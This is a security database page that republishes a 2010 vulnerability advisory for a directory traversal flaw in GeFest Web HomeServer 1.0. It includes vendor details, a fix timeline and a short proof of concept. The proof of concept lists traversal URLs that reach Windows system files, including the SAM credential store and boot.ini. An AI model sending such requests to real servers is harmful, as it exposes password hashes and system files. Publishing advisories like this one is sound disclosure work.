SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow World Laboratory of Bugtraq Database

Arrow  Topic :

GeFest Web HomeServer 1.0 directory traversal


Arrow  WLB : WLB-2010020042  (About)
Arrow  SecurityAlert : None
Arrow  Date : 2010-02-10
Arrow  Credit          : MarkoT
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote : Yes
Arrow  Local     : No
Arrow  Status   : Bug

Arrow  History : [2010-02-10] Started

Arrow  Affected software :  GeFest Web HomeServer version 1.0



Arrow  Text :  

|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@corelan.be |
| |
|-------------------------------------------------[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|------------------------------------------------------------------|

Advisory : CORELAN-10-010
Disclosure date : February 8th, 2010


0x00 : Vulnerability information
--------------------------------

[*] Product : GeFest Web HomeServer
[*] Version : 1.0
[*] URL : http://clearweb.org.ua/
[*] Platform : Windows
[*] Type of vulnerability : Remote Directory Traversal
[*] Risk rating : High (possible access to sensitive files)
[*] Issue fixed in version : 1.2
[*] Vulnerability discovered by : MarkoT
[*] Corelan Team is : corelanc0d3r, EdiStrosar, rick2600, mr_me, ekse,
MarkoT,
sinn3r, Jacky 'Redsees' & jnz


0x01 : Vendor description of software
-------------------------------------
>From the vendor website:

"""Gefest Web Home Server is a Simple Web Server with
Graphical User interface.
Server allow watch video directly from another pc.
Server allow create software storage.
Server support password protection.
Server allow review all user activity (Server log and Activity log)
Share your folders in internet or local network.
Add / Remove folders with use simple interface."""


0x02 : Vulnerability details
----------------------------
By default, the utility runs as an application (and it's very likely that
people will run this with dministrator privileges) The discovered
vulnerability allows an attacker to access files outside of the web
application root.

PoC :
http://192.168.1.200:8080/../../../WINDOWSSYSTEM32calc.exe
http://192.168.1.200:8080/../../../WINDOWSSYSTEM32configsam
http://192.168.1.200:8080/../../../WINDOWSSYSTEM32
http://192.168.1.200:8080/../../../boot.ini



0x03 : Vendor communication
---------------------------
[*] February 4th, 2010 - Vendor contacted
[*] February 5th, 2010 - Version 1.20 released
[*] February 8th, 2010 - Public disclosure


Audyt bezpieczeństwa

Security Audit

Analiza powłamaniowa

Arrow  References :  

None

If you want change this note, please use UCP
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server
Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability
Copyright © SecurityReason.com. All Rights Reserved.